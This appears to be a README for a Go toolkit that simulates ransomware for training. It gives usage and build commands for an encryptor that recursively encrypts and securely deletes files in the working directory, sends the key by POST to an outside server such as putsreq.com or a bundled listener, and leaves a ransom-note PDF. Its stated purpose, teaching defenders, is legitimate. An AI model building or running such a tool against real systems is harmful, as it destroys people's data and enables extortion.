LockSec is a toolkit for simulating ransomware behavior in controlled and isolated environments. The goal of this project is to educate security professionals and system administrators about the mechanics of ransomware attacks. For full transparency, this is written in Go, with help from Copilot. You can compile this to run on Windows or Linux (Windows binaries included).
Always hack responsibly!
Thanks!
Ray @ The Lockdown
X: @privacypod
- File Encryption: Encrypts files with AES-256 encryption.
- Secure Key Management: Generates and securely transmits encryption keys using a POST to an HTTPS listener.
- Decryption Capability: Provides tools to reverse the simulated encryption process.
- HTTPS Listener (optional): A secure server for receiving and logging encryption keys.
- INSTRUCTIONS.PDF: After successful encryption of data, it generates a generic (Lorem ipsum) PDF, which would typically be a ransomware note.
This project is intended for use in simulating a ransomware attack. It should only be used in strictly controlled and isolated environments, for educational purposes only! Please don't be an idiot and use this for anything other than educational or demo use. You have been warned.
DO NOT USE ON PRODUCTION SYSTEMS!
The Encryptor securely encrypts all files in the current working directory and its subdirectories using AES-256 encryption.
- Recursive file encryption
- AES-256 GCM encryption
- Random 32-byte key generation
- Secure file deletion
- Exclusion of specific file types (.exe, .tmp, .ini)
encryptor.exe -s <URL> [-i]
-s <URL>
: Server URL to send the encryption key-i
: Optional flag to ignore SSL certificate errors
Examples:
encryptor.exe -s https://putsreq.com/abcdefghij1234567
encryptor.exe -s https://localhost:8443 -i
Note: Use https://putsreq.com or the provided HTTPS Listener for testing (to retrieve the decryption key)
Next, navigate to the putsreq URL (E.g. https://putsreq.com/abcdefghij1234567) and you'll see the POST. If you are using the provided listener, make sure it's running before running encryptor.exe
and the key will be posted to the console.
Example:
key=493f44835a168123b6d58d2074076ab5517af86334312a2feba344359c8197a4
- Generates a unique nonce for each file
- Combines nonce with encryption key to secure file contents
- Prefixes encrypted data with nonce
The Decryptor reverses the encryption process, restoring files to their original state.
decryptor.exe <decryption_key>
<decryption_key>
: Hexadecimal encryption key from the encryption process
- Reads the encrypted file, which contains both the nonce and the encrypted content.
- Determines the nonce size using the encryption algorithm's specifications.
- Extracts the nonce from the beginning of the file (based on the known nonce size).
- Separates the remaining data as the actual encrypted content.
- Uses the provided decryption key and the extracted nonce to decrypt the file contents.
- Writes the decrypted data to a new file, removing the ".encrypted" extension.
The HTTPS listener is a standalone server that securely receives and displays POST requests. There is nothing special about this, but included for convenience, or if you are using this to demo offline.
- Generates a self-signed SSL certificate
- Runs an HTTPS server on port 8443
- Accepts only POST requests
- Logs received data to the console
./listener
Example Output:
Received passphrase: key=80190a238cef0357984f075722aaffe878fec81f84d9bba3b5fd3d202fb6eeb4
Note: This uses a self-signed certificate, so you can ignore bad certificate
errors.
Install Go, and configure your environment:
set GOOS=windows
set GOARCH=amd64
go mod init locksec
go get -u github.com/jung-kurt/gofpdf
go build -ldflags="-s -w" -o build/encryptor.exe src/encryptor.go
go build -ldflags="-s -w" -o build/decryptor.exe src/decryptor.go
go build -ldflags="-s -w" -o build/listener.exe src/listener.go